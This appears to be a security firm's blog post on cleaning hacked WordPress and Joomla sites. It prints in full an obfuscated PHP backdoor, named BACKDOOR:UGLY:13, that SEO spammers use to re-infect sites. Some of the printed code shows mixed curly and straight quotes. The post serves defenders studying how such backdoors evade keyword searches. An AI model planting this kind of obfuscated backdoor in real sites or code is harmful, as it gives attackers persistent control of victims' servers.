The most complicated part of our job, when cleaning compromised web sites, is ensuring we find all backdoors. If we miss one, the site can be reinfected. We have done a few posts about backdoors already, explaining how they work and in them provide example of what they are and look like:

• ASK Sucuri: What about the backdoors?
• Evil backdoors – Part II

However, despite being a very complicated task, most people still think that removing backdoors consist of searching for eval’s, base64_decode and similar keywords. While that will find some, it’s not highly effective.

Ugly Backdoor

Today, we will present you the BACKDOOR:UGLY:13 (yes, that’s how we name it). It is a code we are finding on WordPress/Joomla sites compromised with SEO Spam to allow the attackers to reinfect and reinject spam code:

<?php
$P81J5DkwYm=’CQWnk4mSgxD’^apC4zA_i;$Oq9E1Iip7=ouw&’o}=’;$qkit=’&=’.HZ^’IX=+=-’;'nyD’.
‘?’;$ywO_bGCvD=’H]’.pTZYkh.’<G}FC’&hTXXRlZLrO.’[{g';$eBwDr2V=#w50jH83IO7'.
' ,|:F-2>1u@:"'.qgQ1.'<*'^EMR.'"@'.tKU2.'$Ln&)(hkx';$Arb='>8a'^Mb9;'Tpr'.
'rH-AhDxq';$Wt0cI9t='(h9'|'}.}';$ON_=eftg.'/l'|F3FDez;$koJhZ='}'.v.#CF0'.
'.=8l`5'&'RVN]m.l}z^H>’;$QgYL=’ “.’.DAMT.’%#Q’|’ $+(<TH@T-#A’;$GDWkPb=’@*’.
‘%DxM”g#’.HCId.’@^’.ItSA^’xW^sN}@’.OR05.’|Jq./F8|’;$g1MRqXRy=$Oq9E1I&/*_Ikm’.
‘Uv*/$Wt0cI9t;$Db_3w=$ON_&$qkit;$_izus6=$koJhZ^$QgYL;$gMYmjr=(‘@)+G)F”N#2$t’.
‘$p4″W-,’|’0!&c`v!,0>4$OP0 f#p’)^$GDWkPbCn5;$DP7=(’5$ C1=”E+c.’.g27mr.#DfTy’.
‘%!’.r0x66.’<22@5x’|'!4(2rc>`3a?!73 ‘.cH9a.’$`<34(“y+P’)&(‘{jWR%O.%1m^R%-<B’.
‘f?W@[#q{];’.ZpqKKG^’J_!’.VG.’[U9%XZ@}'.YJf5.'&LDF$'.MaFIt.'<p');$niZllS=(#'.
'{/7p"'.fjlb.' =i,'^';os0}>?,Qd{(l')|$_bGCvD;if($g1MRqXRy($Db_3w(/*BZKHhHPA'.
'6X$eO*/$gMYmjrlJc))==$DP7)$_izus6(('=[M{]~o~m}’&'~_W9}>’.iyem),$Db_3w(/*y3′.
‘n*/$niZ),$eBwDr2V.$ArvQhb.(‘lv^9{p’^'”C<T6M’));#medAQT)W(Azd-,JG ?f.Er?2R’.
‘z-YAYBxK:@x#4St%.q+_H5^P(XB|+leP9f-{1f’;

Read More